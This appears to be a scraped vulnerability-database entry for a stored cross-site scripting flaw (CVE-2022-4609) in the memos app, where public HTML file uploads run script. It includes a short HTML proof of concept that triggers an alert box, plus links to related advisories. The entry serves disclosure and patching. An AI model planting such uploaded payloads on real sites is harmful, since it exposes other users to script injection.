Lucene search
Lujiefsi5B3115C5-776C-43D3-A7BE-C8DC13AB81CEHistoryNov 23, 2022 - 4:51 p.m.
Cross-site scripting
2022-11-2316:51:57
lujiefsi
www.huntr.dev
4
memos
file upload
vulnerability
cross-site scripting
attack
bugbounty
0.001 Low
EPSS
Percentile
20.3%
Description
memos allow users to upload file and make it public to others. But if the file is html with below content, xss attack can happen.
Proof of Concept
// PoC.js
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<script>
alert("warning");
</script>
</head>
<body>
</body>
</html>
Related
osv
osv
Memos Cross-site Scripting vulnerability
2022-12-19 12:30:23
CVE-2022-4609
2022-12-19 12:15:11
prion
prion
Cross site scripting
2022-12-19 12:15:00
cvelist
cvelist
CVE-2022-4609 Cross-site Scripting (XSS) - Stored in usememos/memos
2022-12-19 00:00:00
veracode
veracode
Cross-site Scripting (XSS)
2022-12-20 06:06:26
nvd
nvd
CVE-2022-4609
2022-12-19 12:15:11
github
github
Memos Cross-site Scripting vulnerability
2022-12-19 12:30:23
cve
cve
CVE-2022-4609
2022-12-19 12:15:11